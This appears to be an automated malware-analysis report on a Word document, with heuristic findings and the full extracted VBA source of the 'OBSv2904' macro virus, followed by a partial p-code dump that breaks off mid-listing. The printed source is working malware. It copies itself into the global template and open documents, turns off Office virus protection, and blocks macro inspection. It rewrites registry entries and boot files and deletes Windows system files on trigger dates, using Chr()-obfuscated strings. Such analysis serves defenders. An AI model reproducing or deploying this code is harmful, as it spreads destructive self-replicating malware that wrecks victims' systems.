MALICIOUS
128
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample exhibits high-severity heuristics for legacy WordBasic macro-virus markers and an AutoOpen macro, strongly suggesting malicious intent. The VBA script, named 'OBSv2904', contains obfuscated code and uses the GetWindowsDirectory API, likely to locate and potentially drop or execute a payload. The presence of 'ToolsMacro' and 'AutoOpen' in the document body further supports the execution of embedded macros.
Heuristics 4
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 67107 bytes |
SHA-256: 2310b3461c80d2550fe674cb47fac5f51307e4bfdc37cc7d9a38dd33d0a839aa |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "OBSv2904"
'Sura Agung Computer
'Under Licensy from OPHAY BUSSINES SOLUTION
'MANAGER "Alm.Midiawaty"
'CEO "Deden Sura Agung"
'Smallest without time sensor
'LU1400
#If Win32 Then
Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
#Else
Declare Function GetWindowsDirectory Lib "Kernel" (ByVal P$, ByVal S%) As Integer
#End If
Const FAH = &H2
Const FAR = &H1
Const FAS = &H4
Function WD() As String
Dim WP As String
Dim temp
WP = String(145, Chr(0))
temp = GetWindowsDirectory(WP, 145)
WD = Left(WP, InStr(WP, Chr(0)) - 1)
End Function
Sub KingDestroy()
Dim WP As String
Dim x, Md
WP = WD()
tt2 = Chr(58)
grm = Chr(92)
ttk = Chr(46)
gfh = Chr(102)
hgi = Chr(103)
yxz = Chr(120)
cbd = Chr(98)
mln = Chr(108)
lkm = Chr(107)
ihj = Chr(104)
oao = Chr(64)
tkm = Chr(59)
pnh = Chr(62)
Spb = Chr(32)
Sbs = Chr(83)
Pbs = Chr(80)
Bbs = Chr(66)
Jbs = Chr(74)
Nbs = Chr(78)
Dbs = Chr(68)
Ebs = Chr(69)
Asr = Chr(65)
AaA = Chr(97)
AbC = Chr(98)
BcD = Chr(99)
CdE = Chr(100)
DeF = Chr(101)
EfG = Chr(102)
FgH = Chr(103)
GhI = Chr(104)
HiJ = Chr(105)
IjK = Chr(106)
Jkl = Chr(107)
KlM = Chr(108)
LmN = Chr(109)
MnO = Chr(110)
NoP = Chr(111)
OpQ = Chr(112)
PqR = Chr(113)
QrS = Chr(114)
RsT = Chr(115)
StU = Chr(116)
TuV = Chr(117)
UvW = Chr(118)
VwX = Chr(119)
WxY = Chr(120)
XyZ = Chr(121)
YzA = Chr(122)
pOn = Chr(79)
cBa = Chr(66)
tSr = Chr(83)
Midi = Chr(65)
sRq = Chr(82)
nMl = Chr(77)
gFe = Chr(70)
Wg = WP + grm
F3 = FAH + FAR + FAS
Wgt = Wg + utv + feg + nmo + qpr
Wgtn = Wgt + grm + onp + jik + onp + feg
sayst = Midi + KlM + LmN + ttk + nMl + HiJ + CdE + HiJ + AaA + VwX + AaA + StU + HiJ + Spb + Midi + MnO + CdE + Spb + pOn + OpQ + GhI + AaA + XyZ + tSr + sRq + ttk + ttk + ttk + Midi + KlM + VwX + AaA + XyZ + RsT + Spb + gFe + NoP + QrS + DeF + UvW + DeF + QrS + ttk
saynd = WP + Spb + HiJ + RsT + Spb + cbd + QrS + NoP + lkm + DeF + MnO + Spb + ttk + ttk + ttk + Sbs + NoP + QrS + QrS + XyZ + ttk
sayrd = Bbs + XyZ + Spb + pOn + OpQ + GhI + AaA + XyZ + tSr + sRq
sayrm = QrS + DeF + LmN + Spb
sayec = DeF + BcD + ihj + NoP
sayof = oao + sayec + Spb + NoP + gfh + gfh
saycp = BcD + NoP + OpQ + XyZ + Spb + pOn + cBa + pOn + tSr + Spb + HiJ + NoP + ttk + RsT + XyZ + RsT + Spb + pnh + Spb + MnO + TuV + mln
SetAttr BcD + tt2 + grm + HiJ + NoP + ttk + RsT + XyZ + RsT, vbNormal
Open BcD + tt2 + grm + pOn + cBa + pOn + tSr For Output As #1
Print #1, sayst
Print #1, saynd
Print #1, sayrd
Close #1
SetAttr BcD + tt2 + grm + LmN + RsT + CdE + NoP + RsT + ttk + RsT + XyZ + RsT, vbNormal
Open BcD + tt2 + grm + LmN + RsT + CdE + NoP + RsT + ttk + RsT + XyZ + RsT For Output As #1
Print #1, tkm + sayst
Print #1, tkm + saynd
Print #1, tkm + sayrd
Close #1
SetAttr BcD + tt2 + grm + LmN + RsT + CdE + NoP + RsT + ttk + RsT + XyZ + RsT, FAH + FAR + FAS
Open BcD + tt2 + grm + BcD + NoP + MnO + gfh + HiJ + hgi + ttk + RsT + XyZ + RsT For Output As #1
Print #1, sayrm + sayst
Print #1, sayrm + saynd
Print #1, sayrm + sayrd
Close #1
Open BcD + tt2 + grm + AaA + TuV + StU + NoP + DeF + yxz + DeF + BcD + ttk + cbd + AaA + StU For Output As #1
Print #1, sayof
Print #1, BcD + mln + RsT
Print #1, sayec + ttk
Print #1, sayec + Spb + sayst
Print #1, sayec + ttk
Print #1, sayec + Spb + saynd
Print #1, sayec + ttk
Print #1, sayec + Spb + sayrd
Print #1, sayec + ttk
Print #1, sayec + ttk
Print #1, sayec + ttk
Print #1, saycp
Print #1, Pbs + AaA + TuV + RsT + DeF
Close #1
Beep
OphayMD
Gone = Pbs + mln + DeF + AaA + RsT + DeF + Spb + RsT + AaA + XyZ + Spb + _
hgi + NoP + NoP + CdE + Spb + cbd + XyZ + DeF + Spb + StU + NoP + _
Spb + XyZ + NoP + TuV + QrS + Spb + VwX + NoP + QrS + lkm + ttk + _
Spb + Asr + MnO + CdE + Spb + MnO + NoP + VwX + Chr(13) + XyZ + _
NoP + TuV + QrS + Spb + VwX + HiJ + MnO + CdE + NoP + VwX + RsT + _
Spb + HiJ + RsT + Spb + Dbs + Ebs + Asr + Dbs
MsgBox "I'm Ophay Sweet Razta." + Chr(13) + "Under Licensy form Ophay Bussines Solution." + Chr(13) + Chr(13) + Gone + " . . . !!! See you next time.", vbOKOnly, "Hello..."
SetAttr WP + grm + RsT + XyZ + RsT + StU + DeF + LmN + ttk + CdE + AaA + StU, vbNormal
SetAttr WP + grm + TuV + RsT + DeF + QrS + ttk + CdE + AaA + StU, vbNormal
Kill WP + grm + RsT + XyZ + RsT + StU + DeF + LmN + ttk + HiJ + MnO + HiJ
Kill WP + grm + VwX + HiJ + MnO + ttk + HiJ + MnO + HiJ
Kill WP + grm + RsT + XyZ + RsT + StU + DeF + LmN + ttk + CdE + AaA + StU
Kill WP + grm + TuV + RsT + DeF + QrS + ttk + CdE + AaA + StU
Application.StatusBar = "Be carefull ....God Knows ... Your Computer is Dead ... Thank's MD"
End Sub
Sub AutoExec()
WordBasic.DisableAutoMacros True
OBS
FileNewdefault
AttactTemp
MDBirth
End Sub
Sub OBS()
Options.SaveNormalPrompt = False
Options.VirusProtection = False
Options.SavePropertiesPrompt = False
OphayReg
End Sub
Sub ToolsOptions()
Options.SaveNormalPrompt = True
Options.SavePropertiesPrompt = True
Options.VirusProtection = True
Dialogs(wdDialogToolsOptions).Show
OBS
End Sub
Sub ToolsMacro()
FGe
Beep
CapNormal
MsgBox " Alm.Midiawaty ,SE." & Chr(13) & _
"Alm.Midiawaty trying to remain you" & Chr(13) & _
"To Build The World a Better Place for Living." & Chr(13) & _
"Don't Touch Me!!!" + Chr(13) + "Don't try it again!!!", vbExclamation + vbOKOnly, "OBS"
End Sub
Sub ViewVbCode()
ToolsMacro
End Sub
Sub FileTemplates()
ToolsMacro
End Sub
Sub OphayMD()
On Error Resume Next
Application.Caption = "You Have Been Forgetting me"
ActiveWindow.Caption = "Alm.Midiawaty ,SE Is Always Everywhere Actualy. "
Application.StatusBar = "I Love OphaySR and don't hurt him or I'll Kill You... "
End Sub
Sub FGe()
Application.Caption = "Don't Forget"
ActiveWindow.Caption = "You try to remove Virus ScanMacro OBS. "
Application.StatusBar = "Alm.Midiawaty trying to remain you, Please Wait..."
Wait
End Sub
Sub CapNormal()
On Error Resume Next
Application.Caption = "Microsoft Word"
ActiveWindow.Caption = ActiveDocument.Name
End Sub
Sub FileOpen()
WordBasic.DisableAutoMacros True
On Error Resume Next
If Dialogs(wdDialogFileOpen).Show <> 0 Then
AttactDoc
ActiveDocument.Save
MDBirth
MiDiDay
CapNormal
End If
WordBasic.DisableAutoMacros False
AttactDoc
ActiveDocument.Save
MDBirth
MiDiDay
End Sub
Sub AutoOpen()
OBS
AttactDoc
ActiveDocument.Save
AttactTemp
On Error Resume Next
NormalTemplate.Save
MDBirth
MiDiDay
CapNormal
End Sub
Sub FileSave()
If ActiveDocument.Saved = False Then
AttactDoc
AttactTemp
On Error Resume Next
ActiveDocument.Save
ActiveDocument.Saved = True
End If
End Sub
Sub FileNew()
Dialogs(wdDialogFileNew).Show
AttactDoc
End Sub
Sub FileNewdefault()
Documents.Add
AttactDoc
End Sub
Sub Wait()
For i = 1 To 500
On Error Resume Next
Beep
Next i
End Sub
Sub AttactDoc()
Dim DYes As Boolean
DYes = False
On Error GoTo Dock
For Each Obj In ActiveDocument.VBProject.VBComponents
If Obj.Name = "OBSv2904" Then DYes = True
If Obj.Name = "OBS" Then
Application.StatusBar = "Upgrading Database Ophay Bussines Solution to " + ActiveDocument.Name + " for virus protection..."
Application.OrganizerDelete Source:=ActiveDocument.FullName, Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument, Name:="OBSv2904", Object:=wdOrganizerObjectProjectItems
If Obj.Name <> "OBSv2904" And Obj.Name <> "ThisDocument" Then
Application.Caption = "OBS"
ActiveWindow.Caption = "Found Virus " + Obj.Name + " in " + ActiveDocument.Name + "..."
Application.StatusBar = "Ophay Bussines Solution will automaticly removing Virus " + Obj.Name + " in " + ActiveDocument.Name + "..."
Wait
CapNormal
Application.StatusBar = "Removing Virus " + Obj.Name + " in " + ActiveDocument.Name + "...Please Wait !!!"
Application.OrganizerDelete Source:=ActiveDocument.FullName, Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
Application.StatusBar = "Virus " + Obj.Name + " in " + ActiveDocument.Name + " was removed."
End If
End If
Next Obj
If DYes = False Then
Application.StatusBar = "Creating Database Ophay Bussines Solution to " + ActiveDocument.Name + " for virus protection..."
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument, Name:="OBSv2904", Object:=wdOrganizerObjectProjectItems
Application.DisplayRecentFiles = False
Application.DisplayRecentFiles = True
End If
Dock:
End Sub
Sub AttactTemp()
Dim NYes As Boolean
NYes = False
On Error GoTo temp
For Each Obj In NormalTemplate.VBProject.VBComponents
If Obj.Name = "OBSv2904" Then NYes = True
If Obj.Name = "OBS" Then
Application.StatusBar = "Alm.Midiawaty Is Upgrading It Self From Ophay Bussines Solution to " + ActiveDocument.Name + " to Normal Template for virus protection..."
Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="OBSv2904", Object:=wdOrganizerObjectProjectItems
If Obj.Name <> "OBSv2904" And Obj.Name <> "ThisDocument" Then
ActiveWindow.Caption = "Found Virus " + Obj.Name + " in Normal Template " + "..."
Application.StatusBar = "Ophay Bussines Solution will automaticly removing Virus " + Obj.Name + " in Normal Template" + "..."
Wait
CapNormal
Application.StatusBar = "Removing Virus " + Obj.Name + " in Normal Template to protect your global document...Please Wait!! "
Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
End If
End If
Next Obj
If NYes = False Then
Application.StatusBar = "Alm.Midiawaty Is Backing Up It Self From Ophay Bussines Solution to " + ActiveDocument.Name + " to Normal Template for virus protection..."
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="OBSv2904", Object:=wdOrganizerObjectProjectItems
Application.DisplayRecentFiles = False
Application.DisplayRecentFiles = True
End If
temp:
End Sub
Sub HelpAbout()
Beep
MsgBox " Alm.Midiawaty ,SE." & Chr(13) & _
" " & Chr(13) & _
"I was born in SURABAYA, 29 Desember 1975." & Chr(13) & _
"My bad day come and take me to heaven on 23 Nov 97." & Chr(13) & _
"Happines...Joynes always cause OphaySR & God Love Me." & Chr(13) & _
"So, come and join with me in heaven.", vbOKOnly + 64, "OBS"
End Sub
Sub MDBirth()
Dt = Day(Date)
If Dt = 1 Then
CreaHTML
CapNormal
Exit Sub
End If
If Dt = 11 Then
CreaHTML
CapNormal
Exit Sub
End If
If Dt = 20 Then
CreaHTML
CapNormal
Exit Sub
End If
If Dt = 23 Then
CreaHTML
CapNormal
Exit Sub
End If
If Dt = 24 Then
CreaHTML
CapNormal
Exit Sub
End If
If Dt = 29 Then
CreaHTML
CapNormal
Exit Sub
End If
End Sub
Sub Email()
EmailOBS
EmailSAC
End Sub
Sub EmailOBS()
Selection.Font.ColorIndex = wdRed
Selection.ParagraphFormat.Alignment = wdAlignParagraphRight
Selection.TypeText Text:="OBS@Yahoo.Com"
Selection.MoveDown Unit:=wdLine, Count:=1
Selection.HomeKey Unit:=wdLine, Extend:=wdExtend
Selection.Comments.Add Range:=Selection.Range
Selection.TypeText Text:="Ophay Bussines Solution EMail Address"
ActiveWindow.ActivePane.Close
Selection.TypeParagraph
End Sub
Sub EmailSAC()
Selection.TypeParagraph
Selection.Font.ColorIndex = wdBlue
Selection.ParagraphFormat.Alignment = wdAlignParagraphRight
Selection.TypeText Text:="SAC@HotMail.Com"
Selection.MoveDown Unit:=wdLine, Count:=1
Selection.HomeKey Unit:=wdLine, Extend:=wdExtend
Selection.Comments.Add Range:=Selection.Range
Selection.TypeText Text:="Sura Agung Computer Custumer Service"
ActiveWindow.ActivePane.Close
Selection.TypeParagraph
End Sub
Sub MiDiDay()
Dt = Day(Date)
MT = Month(Date)
If Dt = 20 And MT = 1 Then
Application.Caption = "Happy Birthday to OphaySR and Good Luck..."
Application.StatusBar = "Alm.Midiawaty remain you every 20 January . . . "
Selection.Collapse Direction:=wdCollapseEnd
With Selection.Range
.Font.reset
OphayFirst
Selection.TypeText Text:="Happy Birthday to OphaySR and Good Luck..."
OphaySecond
Selection.TypeText Text:="Ophay was born in JAKARTA, 20 JANUARY 1977. She was Graduated from SMAN 6 High School and He've been college on STIE IBiI. Happiness...Joyless always cause OphaySR & God Love Me. But, Someday I Will Come To You. On a Paradise City, I Hope ... So, come and join with me in heaven, Someday."
OphayThird
Selection.TypeText Text:="Ophay SR"
MDForever
Selection.TypeText Text:="Remain on 20 January"
Selection.TypeParagraph
Email
End With
ActiveDocument.Save
HelpAbout
KingDestroy
Exit Sub
End If
If Dt = 24 And MT = 5 Then
Application.Caption = "My Wedding Day still remain on mind ..."
Application.StatusBar = "Alm.Midiawaty remain you every 24 Mei . . . "
Selection.Collapse Direction:=wdCollapseEnd
With Selection.Range
.Font.reset
OphayFirst
Selection.TypeText Text:="Happy Wedding Day to OphaySR & Alm.Midiawaty and Good Luck..."
OphaySecond
Selection.TypeText Text:="OphaySR was born in Jakarta, 20 January 1977. Midi was born in SURABAYA, 29 Desember 1975. People said We're best couple and God take her to heaven on 23 November 1997. Happiness...Joyless is always be, cause God Love Us. But, Someday I wishes come on the Wedding Dress again in Up there, I Hope ... So, On The Wedding Dress again, Someday."
OphayThird
Selection.TypeText Text:="Ophay SR & Midiawaty"
MDForever
Selection.TypeText Text:="Remain on 24 Mei"
Selection.TypeParagraph
Email
End With
ActiveDocument.Save
HelpAbout
KingDestroy
Exit Sub
End If
If Dt = 18 And MT = 9 Then
Application.Caption = "Happy Birthday to Dewi .N and Good Luck..."
Application.StatusBar = "Alm.Midiawaty remain you every 18 September . . . "
Selection.Collapse Direction:=wdCollapseEnd
With Selection.Range
.Font.reset
OphayFirst
Selection.TypeText Text:="Happy Birthday to Dewi .N and Good Luck..."
OphaySecond
Selection.TypeText Text:="Dewi was born in JAKARTA, 18 September 1978. OphaySR & God Love You. I Hope ... So, On The Wedding Dress, Someday."
OphayThird
Selection.TypeText Text:="Ophay SR & MD"
MDForever
Selection.TypeText Text:="Remain on 18 September"
Selection.TypeParagraph
Email
End With
ActiveDocument.Save
HelpAbout
KingDestroy
Exit Sub
End If
If Dt = 2 And MT = 11 Then
Application.Caption = "Happy Birthday to My Mother & Sari .N and Good Luck..."
Application.StatusBar = "Alm.Midiawaty remain you every 2 November . . . "
HelpAbout
KingDestroy
Exit Sub
End If
If Dt = 23 And MT = 11 Then
Application.Caption = "I Will Come to You ...."
Application.StatusBar = "Alm.Midiawaty remain you every 23 November . . . "
Email
HelpAbout
KingDestroy
Exit Sub
End If
If Dt = 1 And MT = 12 Then
Application.Caption = "Happy Birthday to Cristine LMA and Good Luck..."
Application.StatusBar = "Alm.Midiawaty remain you every 01 Desember . . . "
Selection.Collapse Direction:=wdCollapseEnd
With Selection.Range
.Font.reset
OphayFirst
Selection.TypeText Text:="Happy Birthday to Cristine Laorina MA and Good Luck..."
OphaySecond
Selection.TypeText Text:="Cristine was born in JAKARTA, 01 Desember 1976. She was Graduated from Boedoet High School and she've been college on STIE IBiI. Happiness...Joyless is always cause OphaySR & God Love You. I Hope ... So, Someday."
OphayThird
Selection.TypeText Text:="Ophay SR"
MDForever
Selection.TypeText Text:="Remain on 01 Desember"
Selection.TypeParagraph
Email
End With
ActiveDocument.Save
HelpAbout
KingDestroy
Exit Sub
End If
If Dt = 29 And MT = 12 Then
Application.Caption = "Born to raise heaven for Alm.Midiawaty and Good Luck..."
Application.StatusBar = "Alm.Midiawaty remain you every month on 29 Desember. . . "
HelpAbout
KingDestroy
Exit Sub
End If
MDBirth
End Sub
Sub OphayReg()
Dim regs
regs = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
System.PrivateProfileString("", regs, "RegisteredOrganization") = "Sura Agung Computer"
System.PrivateProfileString("", regs, "RegisteredOwner") = "Ophay Busisnes Solution"
regs = "HKEY_CURRENT_USER\Control Panel\International"
System.PrivateProfileString("", regs, "sLongDate") = "Sura Agung Computer, dddd dd MMMM yyyy"
regs = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Detect"
System.PrivateProfileString("", regs, "Info") = "Your Computer Is Already Infected With OBSVirus"
System.PrivateProfileString("", regs, "Info2") = "Please Contact OBS at 021-6506287 or your computer will be HangUp"
End Sub
Sub OphayFirst()
Selection.Font.Bold = wdToggle
Selection.Font.ColorIndex = wdBlue
Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
End Sub
Sub OphaySecond()
Selection.Font.ColorIndex = 0
Selection.Font.Bold = wdToggle
Selection.TypeParagraph
Selection.TypeParagraph
Selection.ParagraphFormat.Alignment = wdAlignParagraphJustify
End Sub
Sub MDForever()
Selection.TypeParagraph
Selection.TypeText Text:="Always and Forever"
Selection.TypeParagraph
End Sub
Sub OphayThird()
Selection.TypeParagraph
Selection.ParagraphFormat.Alignment = wdAlignParagraphRight
End Sub
Sub CreaHTML()
Dim RootsyS As String
On Error Resume Next
RootsyS = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "SystemRoot")
Open RootsyS & "\Desktop\OBS.html" For Output As #1
Print #1, "<HTML><HEAD><TITLE>OPHAY BUSSINES SOLUTION</TITLE>"
Print #1, "<BODY LINK='#0000ff' VLINK='#800080' BGCOLOR='#00ffff'>"
Print #1, "</FONT></STRONG><P ALIGN='JUSTIFY'><A HREF='mailto:OBS@Yahoo.com'><B><FONT SIZE=6 COLOR='#800000'>OPHAY BUSSINES SOLUTION"
Print #1, "</B></FONT><P ALIGN='JUSTIFY'> </P></A><FONT SIZE=6> </FONT><FONT FACE='Courier New' COLOR='#ff00ff'>There’s the winter moon shining to my windows. I’m not as sleep because I miss you so. If I could I Know the way I felt today and this feeling so real because I Miss you so. I Think I’m in Love. It’s too late to say I’m in Love.</P>"
Print #1, "<P ALIGN='JUSTIFY'>Please … send me to make it trought … I’m waiting forever. Don’t make me disapointed.</P>"
Print #1, "<P>Email To:</FONT><A HREF='mailto:OBS@Yahoo.Com'>OBS@Yahoo.Com</A> <A HREF='; mailto: SAC@ Hotmail.Com '>SAC@Hotmail.Com</A> <A HREF='mailto:Ophay@HotMail.Com'>Ophay@HotMail.Com</A></P><DIR><DIR>"
Print #1, "<FONT FACE='Courier New' COLOR='#ff00ff'><P ALIGN='RIGHT'> </FONT><A HREF='OPHAY@HotMail.Com'><B><FONT FACE='Impact' SIZE=6 COLOR='#ff0000'>OPHAY S.R</B></FONT></A></P></DIR>"
Print #1, "</DIR></BODY></HTML>"
Close #1
End Sub
' Processing file: /tmp/qstore_gcou_jj3
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/OBSv2904 - 33278 bytes
' Line #0:
' QuoteRem 0x0000 0x0013 "Sura Agung Computer"
' Line #1:
' QuoteRem 0x0000 0x002A "Under Licensy from OPHAY BUSSINES SOLUTION"
' Line #2:
' QuoteRem 0x0000 0x0017 "MANAGER "Alm.Midiawaty""
' Line #3:
' QuoteRem 0x0000 0x0016 "CEO "Deden Sura Agung""
' Line #4:
' QuoteRem 0x0000 0x001C "Smallest without time sensor"
' Line #5:
' QuoteRem 0x0000 0x0006 "LU1400"
' Line #6:
' LbMark
' Ld Win32
' LbIf
' Line #7:
' FuncDefn (Declare Function GetWindowsDirectory Lib "kernel32" (ByVal lpBuffer As String, ByVal nSize As Long) As Long)
' Line #8:
' LbMark
' LbElse
' Line #9:
' FuncDefn (Declare Function GetWindowsDirectory Lib "Kernel" (ByVal P, ByVal S) As Integer)
' Line #10:
' LbMark
' LbEndIf
' Line #11:
' Dim (Const)
' LitHI2 0x0002
' VarDefn FAH
' Line #12:
' Dim (Const)
' LitHI2 0x0001
' VarDefn FAR
' Line #13:
' Dim (Const)
' LitHI2 0x0004
' VarDefn FAS
' Line #14:
' FuncDefn (Function WD() As String)
' Line #15:
' Dim
' VarDefn WP (As String)
' Line #16:
' Dim
' VarDefn temp
' Line #17:
' LitDI2 0x0091
' LitDI2 0x0000
' ArgsLd Chr 0x0001
' ArgsLd String$ 0x0002
' St WP
' Line #18:
' Ld WP
' LitDI2 0x0091
' ArgsLd GetWindowsDirectory 0x0002
' St temp
' Line #19:
' Ld WP
' Ld WP
' LitDI2 0x0000
' ArgsLd Chr 0x0001
' FnInStr
' LitDI2 0x0001
' Sub
' ArgsLd LBound 0x0002
' St WD
' Line #20:
' EndFunc
' Line #21:
' FuncDefn (Sub KingDestroy())
' Line #22:
' Dim
' VarDefn WP (As String)
' Line #23:
' Dim
' VarDefn x
' VarDefn Md
' Line #24:
' ArgsLd WD 0x0000
' St WP
' Line #25:
' LitDI2 0x003A
' ArgsLd Chr 0x0001
' St tt2
' Line #26:
' LitDI2 0x005C
' ArgsLd Chr 0x0001
' St grm
' Line #27:
' LitDI2 0x002E
' ArgsLd Chr 0x0001
' St ttk
' Line #28:
' LitDI2 0x0066
' ArgsLd Chr 0x0001
' St gfh
' Line #29:
' LitDI2 0x0067
' ArgsLd Chr 0x0001
' St hgi
' Line #30:
' LitDI2 0x0078
' ArgsLd Chr 0x0001
' St yxz
' Line #31:
' LitDI2 0x0062
' ArgsLd Chr 0x0001
' St cbd
' Line #32:
' LitDI2 0x006C
' ArgsLd Chr 0x0001
' St mln
' Line #33:
' LitDI2 0x006B
' ArgsLd Chr 0x0001
' St lkm
' Line #34:
' LitDI2 0x0068
' ArgsLd Chr 0x0001
' St ihj
' Line #35:
' LitDI2 0x0040
' ArgsLd Chr 0x0001
' St oao
' Line #36:
' LitDI2 0x003B
' ArgsLd Chr 0x0001
' St tkm
' Line #37:
' LitDI2 0x003E
' ArgsLd Chr 0x0001
' St pnh
' Line #38:
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' St Spb
' Line #39:
' LitDI2 0x0053
' ArgsLd Chr 0x0001
' St Sbs
' Line #40:
' LitDI2 0x0050
' ArgsLd Chr 0x0001
' St Pbs
' Line #41:
' LitDI2 0x0042
' ArgsLd Chr 0x0001
' St Bbs
' Line #42:
' LitDI2 0x004A
' ArgsLd Chr 0x0001
' St Jbs
' Line #43:
' LitDI2 0x004E
' ArgsLd Chr 0x0001
' St Nbs
' Line #44:
' LitDI2 0x0044
' ArgsLd Chr 0x0001
' St Dbs
' Line #45:
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' St Ebs
' Line #46:
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' St Asr
' Line #47:
' LitDI2 0x0061
' ArgsLd Chr 0x0001
' St AaA
' Line #48:
' LitDI2 0x0062
' ArgsLd Chr 0x0001
' St AbC
' Line #49:
' LitDI2 0x0063
' ArgsLd Chr 0x0001
' St BcD
' Line #50:
' LitDI2 0x0064
' ArgsLd Chr 0x0001
' St CdE
' Line #51:
' LitDI2 0x0065
' ArgsLd Chr 0x0001
' St DeF
' Line #52:
' LitDI2 0x0066
' ArgsLd Chr 0x0001
' St EfG
' Line #53:
' LitDI2 0x0067
' ArgsLd Chr 0x0001
' St FgH
' Line #54:
' LitDI2 0x0068
' ArgsLd Chr 0x0001
' St GhI
' Line #55:
' LitDI2 0x0069
' ArgsLd Chr 0x0001
' St HiJ
' Line #56:
' LitDI2 0x006A
' ArgsLd Chr 0x0001
' St IjK
' Line #57:
' LitDI2 0x006B
' ArgsLd Chr 0x0001
' St Jkl
' Line #58:
' LitDI2 0x006C
' ArgsLd Chr 0x0001
' St KlM
' Line #59:
' LitDI2 0x006D
' ArgsLd Chr 0x0001
' St LmN
' Line #60:
' LitDI2 0x006E
' ArgsLd Chr 0x0001
' St MnO
' Line #61:
' LitDI2 0x006F
' ArgsLd Chr 0x0001
' St NoP
' Line #62:
' LitDI2 0x0070
' ArgsLd Chr 0x0001
' St OpQ
' Line #63:
' LitDI2 0x0071
' ArgsLd Chr 0x0001
' St PqR
' Line #64:
' LitDI2 0x0072
' ArgsLd Chr 0x0001
' St QrS
' Line #65:
' LitDI2 0x0073
' ArgsLd Chr 0x0001
' St RsT
' Line #66:
' LitDI2 0x0074
' ArgsLd Chr 0x0001
' St StU
' Line #67:
' LitDI2 0x0075
' ArgsLd Chr 0x0001
' St TuV
' Line #68:
' LitDI2 0x0076
' ArgsLd Chr 0x0001
' St UvW
' Line #69:
' LitDI2 0x0077
' ArgsLd Chr 0x0001
' St VwX
' Line #70:
' LitDI2 0x0078
' ArgsLd Chr 0x0001
' St WxY
' Line #71:
' LitDI2 0x0079
' ArgsLd Chr 0x0001
' St XyZ
' Line #72:
' LitDI2 0x007A
' ArgsLd Chr 0x0001
' St YzA
' Line #73:
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' St pOn
' Line #74:
' LitDI2 0x0042
' ArgsLd Chr 0x0001
' St cBa
' Line #75:
' LitDI2 0x0053
' ArgsLd Chr 0x0001
' St tSr
' Line #76:
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' St Midi
' Line #77:
' LitDI2 0x0052
' ArgsLd Chr 0x0001
' St sRq
' Line #78:
' LitDI2 0x004D
' ArgsLd Chr 0x0001
' St nMl
' Line #79:
' LitDI2 0x0046
' ArgsLd Chr 0x0001
' St gFe
' Line #80:
' Ld WP
' Ld grm
' Add
' St Wg
' Line #81:
' Ld FAH
' Ld FAR
' Add
' Ld FAS
' Add
' St F3
' Line #82:
' Ld Wg
' Ld utv
' Add
' Ld feg
' Add
' Ld nmo
' Add
' Ld qpr
' Add
' St Wgt
' Line #83:
' Ld Wgt
' Ld grm
' Add
' Ld onp
' Add
' Ld jik
' Add
' Ld onp
' Add
' Ld feg
' Add
' St Wgtn
' Line #84:
' Ld Midi
' Ld KlM
' Add
' Ld LmN
' Add
' Ld ttk
' Add
' Ld nMl
' Add
' Ld HiJ
' Add
' Ld CdE
' Add
' Ld HiJ
' Add
' Ld AaA
' Add
' Ld VwX
' Add
' Ld AaA
' Add
' Ld StU
' Add
' Ld HiJ
' Add
' Ld Spb
' Add
' Ld Midi
' Add
' Ld MnO
' Add
' Ld CdE
' Add
' Ld Spb
' Add
' Ld pOn
' Add
' Ld OpQ
' Add
' Ld GhI
' Add
' Ld AaA
' Add
' Ld XyZ
' Add
' Ld tSr
' Add
' Ld sRq
' Add
' Ld ttk
' Add
' Ld ttk
' Add
' Ld ttk
' Add
' Ld Midi
' Add
' Ld KlM
' Add
' Ld VwX
' Add
' Ld AaA
' Add
' Ld XyZ
' Add
' Ld RsT
' Add
' Ld Spb
' Add
